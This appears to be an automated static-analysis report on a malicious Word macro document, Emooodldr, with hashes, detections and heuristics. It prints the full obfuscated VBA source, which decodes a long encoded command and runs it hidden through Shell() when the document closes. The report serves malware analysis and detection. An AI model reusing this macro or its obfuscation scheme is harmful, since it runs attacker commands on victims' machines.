Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 dc8c82e7dd88d9d4…

MALICIOUS

Office (OOXML)

33.3 KB Created: 2017-10-25 18:34:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-04-18
MD5: 0b841d3ea970f05ddf1009711d82572d SHA-1: 0317909ce88167641bda95d27d7890afe346d0ab SHA-256: dc8c82e7dd88d9d42f2872fee149eb219b537c2f21035834bed17cd205f54a51
244 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing VBA macros, specifically an Auto_Close macro that calls the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. ClamAV detection confirms this as Doc.Malware.Emooodldr-6711604-0.

Heuristics 6

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2461 bytes
SHA-256: 2df131f4297a1ec572b7bb77b0fe56aa20f230431f61f655c4c4cf23b57a2188
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function critico(serio As Integer) As String
 Dim rullino() As Variant
 rullino = Array(",", "l", "/", "$", "T", "W", "'", "1", "O", "D", "a", ":", "4", "n", "g", "m", "w", "c", "3", "?", "K", "C", "2", "N", "J", "-", ")", "\", "p", "8", "F", "i", "s", "S", ";", "r", "B", "u", "X", "v", " ", "d", "t", "o", "j", "y", "e", "E", "(", "P", "A", "x", "I", "=", "+", ".", "f", "h", "b")
 Dim sfoderare As Integer
 
 For sfoderare = LBound(rullino) To UBound(rullino)
   If sfoderare = serio Then
    critico = rullino(sfoderare)
   End If
 Next
 
End Function

Function chirurgo(monotono As String)
    monotono = StrConv(monotono, vbUnicode)
    chirurgo = Split(Left(monotono, Len(monotono) - 1), vbNullChar)
End Function

Function delirio(nordico As String) As String
  Dim inter As Integer
  Dim parola As String
  Dim berlina As Variant
  berlina = chirurgo(Trim(nordico))
  For sfoderare = 0 To Len(nordico)
  
    If (sfoderare + 1) <= UBound(berlina) Then
    Dim malinteso As String
    malinteso = berlina(sfoderare)
    sfoderare = sfoderare + 1
    malinteso = malinteso + berlina(sfoderare)
    
    parola = parola + critico(Int(malinteso))
    End If
  Next
  
  delirio = parola
End Function

Public Function rischio(scippo As String)
  Shell scippo, 0
End Function

Sub AutoClose()
 Call Application.Run("rischio", delirio("171541554651464002174028431646353257460101402547514617403645281032324025234349402521431515101341404823461625085844461742403345324246155523464255054658210131461342265509431613014310413031014648065742422811020210101341464614131046101345551743150213311343023237284635565515415606004003461339115049490950045040544006273620412455465146062634403342103542254935431746323240034613391150494909500450062736204124554651460634404823461625085844461742403345324246155523464255054658210131461342265509431613014310413342353113144806574242281102021010134146461413104610134555174315023255285728193141533237284635560626344052473848482346162508584446174240334532424615552346425505465821013146134226550943161301431041334235311314480657424228110202180755072912552218125507122902325528572806262634"))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: e2410f65041192ecc581e34489054297f43981758fe2738868184e0bbddc349d
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).